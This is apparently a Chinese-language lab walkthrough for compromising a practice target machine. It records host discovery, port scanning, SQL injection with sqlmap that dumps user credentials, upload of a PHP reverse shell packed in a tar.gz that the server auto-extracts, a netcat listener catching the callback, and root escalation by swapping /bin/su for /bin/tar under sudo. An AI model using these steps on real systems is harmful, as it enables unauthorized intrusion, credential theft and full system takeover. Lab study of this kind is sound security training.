确认物理地址
00:0C:29:BC:05:DE
ip扫描
arp-scan -l
端口扫描
nmap 192.168.48.167
访问一下80端口
burp抓包
找到一个登录框
想着burp抓包试试
将抓到的包放入kali中的文件中使用sqlmap注入试试
sqlmap
存在sql注入
sqlmap -r password --batch --random-agent 
发现存在sql注入,可使用万能密码登录
利用--dump命令打印出用户信息
sqlmap -r passwd --batch --random-agent --dump
文件上传
登录发现有文件上传功能点,默认万能密码登录是第一个用户,发现不能上传,我们切换第二个用户
来到upload页面,我们上传一个webshell文件
来到用户目录下
/~etenenbaum点击上传的文件发现没有解析
我们想起来了上面勾选的那个自动解压按钮,利用kali自带的webshell并将其压缩
find / -type f -name "php*reverse*"
cp /usr/share/webshells/php/php-reverse-shell.php ./
vim /php-reverseoshell.php #修改为kali ip
tar -czf php.tar.gz php-reverse-shell.php
上传
发现自动解压了
反弹shell
kali开启监听(我这里没有修改端口默认的)双击执行php文件反弹得到shell
nc -lvvp 8888
提权
sudo -l 提权
sudo mv /bin/tar /bin/tar.bak
sudo mv /bin/su /bin/tar
sudo tar
提权成功